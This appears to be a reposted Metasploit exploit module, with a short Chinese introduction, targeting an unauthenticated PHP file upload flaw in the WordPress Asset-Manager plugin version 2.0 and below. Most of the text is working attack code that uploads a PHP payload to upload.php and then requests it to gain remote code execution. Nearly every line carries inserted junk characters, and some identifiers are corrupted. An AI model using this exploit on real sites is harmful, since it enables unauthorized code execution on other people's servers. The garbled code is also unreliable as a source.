这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。7 X; |4 h5 N7 l) Q
) \: v& ?6 D$ W" k$ p6 D
##
9 z3 j3 `9 @8 ~! d+ I# s# This file is part of the Metasploit Framework and may be subject to
& d# o% M, v& ]. ]0 p0 u. z# redistribution and commercial restrictions. Please see the Metasploit
/ \# v( G. X" `5 q6 ~# Framework web site for more information on licensing and terms of use.
. j4 f9 @+ d* q: n) W# http://metasploit.com/framework/
0 t% c5 w, L/ o##1 \2 ^# }& }- O, D, z
3 Y3 F# W9 Q8 U% ^require 'msf/core'' y6 i4 w' A' w
require 'msf/core/exploit/php_exe'; C) h7 M4 `, x% o, @3 Y) G9 m
& F2 a0 i. G: g! C
class Metasploit3 < Msf::Exploit::Remote) H. J" S6 {6 {
Rank = ExcellentRanking. q* s- \* y* p6 U8 s, z/ j7 T
4 L9 `8 j4 K6 \4 m+ }4 C8 _5 V+ d include Msf::Exploit::Remote::HttpClient G' z# \1 H/ e0 Q6 k& k3 v: b
include Msf::Exploit:hpEXE3 F s' [: j. O- t9 t) O2 y& l
: n' _* G: M% ]3 S' Q) p, i" O
def initialize(info = {})$ S/ X) p/ k* q2 F
super(update_info(info,
; L% D3 R$ c6 l! y. I 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
6 W- d8 ^/ s! j4 K" e' M* a 'Description' => %q{
- t* n2 W- o4 |5 X( _4 V This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress+ a0 Q0 X. |+ C
plugin. By abusing the upload.php file, a malicious user can upload a file to a
3 s5 j. n. R$ j& J5 O: V; H temp directory without authentication, which results in arbitrary code execution.
( X6 P: `6 R8 ?) m9 z. o8 t; w T },6 ?+ Z, }1 T( H
'Author' =>- U, {* T( t# u6 D+ n
[& c# P6 z M" v, o* W; O) v1 B+ K
'Sammy FORGIT', # initial discovery; i6 u* _4 G$ K" E% H0 n/ N% l5 Q \
'James Fitts <fitts.james[at]gmail.com>' # metasploit module% C4 I9 Z+ ~( `) W
],
6 f. C4 u8 w. n+ o9 B& e' ` 'License' => MSF_LICENSE,( B, A2 P) z h2 {9 S
'References' =>, B& f+ s5 Z: ?. h, L: u5 q
[
) ^) @7 U Y4 h$ o" v' ?2 M [ 'OSVDB', '82653' ],
( h2 n" k8 P. e, q; W [ 'BID', '53809' ],
% D& k, A! @3 @/ x3 y' R0 h [ 'EDB', '18993' ],9 Q" h8 d% p& b8 o/ E# F3 L
[ 'URL', 'http:// www.myhack58.com /' ]1 }7 z0 O: ]+ n- C
],
( T& Q! \' T& g) B# f 'Payload' =>9 r0 E/ R& r" {) e7 Q7 q
{# E! L0 ?1 I/ b8 T
'BadChars' => "\x00",
3 C8 {4 b* S( V },
- Q$ i- O0 b: e" n 'Platform' => 'php',8 I5 h) A' O' h) B/ e3 f1 a
'Arch' => ARCH_PHP,& p1 }* w0 K( _
'Targets' =>. l, j6 X+ f7 C# g4 W+ @
[
. n9 i0 o [- I [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],6 b; A/ b! n( U& n
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], `: Q5 O: o+ s1 Z$ Q
],
7 N% R# l$ N4 m( x8 a6 M" K; d6 a 'DefaultTarget' => 0,4 O5 j2 g/ q3 p) H% c
'DisclosureDate' => 'May 26 2012')). f, U5 w7 ], @* W. V( J$ }3 k
, L* n% I% k3 r8 {( Z" q @# h( B( a- j6 P
register_options(: E# O; E D" M3 k3 o7 {6 S. b0 i+ k
[
. `0 |% k* z$ @/ t- K OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])( m- o* w/ u z8 F& d
], self.class)( @9 X4 |4 Q, z6 V
end
: b( j9 F9 b. x0 ?$ ~, J! [! k! L1 T
- q2 E- R. a0 A def exploit6 E3 v: R. h- e( c
uri = target_uri.path" m: b1 T+ x; u& `# K
uri << '/' if uri[-1,1] != '/'
+ `6 N0 R) m0 f; e peer = "#{rhost}:#{rport}"
4 n8 n' j, ^/ w& i4 }9 D9 R3 u3 F6 { payload_name = "#{rand_text_alpha(5)}.php"
. q* W; l5 [) K4 N php_payload = get_write_exec_payload(:unlink_self=>true)
% M. g- L% T! Z) i7 h; d2 P7 L" r! h7 l % {2 F- K. d0 O9 H2 o {" C9 N
data = Rex::MIME::Message.new
8 @, f& G% P- [, m data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")* y# x: \7 ^6 P8 ~8 f" l5 w4 u
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
5 i6 f; k5 R7 Y2 a2 J* ~ . m. f1 B$ t( X* h7 k% K
print_status("#{peer} - Uploading payload #{payload_name}")$ F$ H- ]! S4 M$ `! G& k
res = send_request_cgi({
- c# Y" j2 L: k& k5 b; } 'method' => 'POST',
7 o5 I5 b1 `4 [$ j% H/ I; f) T% h, P 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
4 E8 h3 P8 [ [* t/ A 'ctype' => "multipart/form-data; boundary=#{data.bound}", C7 D1 j7 U5 Z; T, f8 P) P N
'data' => post_data/ H1 a0 K2 M8 c$ H% F% V" |" g
})2 O; V* {- F6 k5 |
% n! R& Q/ n& J7 S# x if not res or res.code != 200 or res.body !~ /#{payload_name}/' J0 @2 T# K+ L+ l E/ [" ]
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
9 F' K1 |+ e9 G* j% \! rend$ |6 p3 w, @) Y, _9 D
6 [' `; k2 c3 D4 O/ t
print_status("#{peer} - Executing payload #{payload_name}")
. j; D6 s" a" t$ {5 ]# U# a res = send_request_raw({
+ E$ l x5 ~6 S2 S! C/ o4 d 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",1 Q7 @& U$ m/ s. y0 a9 [+ P6 T
'method' => 'GET'
$ {/ h2 g/ [- q })
: n! V$ f- y a. c5 |
$ i/ m. b2 x. a& a if res and res.code != 200# q6 V9 l% ?7 S
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")0 Z# H( F- U Y& ` l
end
, z1 ]4 e4 W/ b; O end+ r& f( r' H, m7 A' b: E' x o
end
, Y: Q- p6 ]% ~% G) O! Z6 o |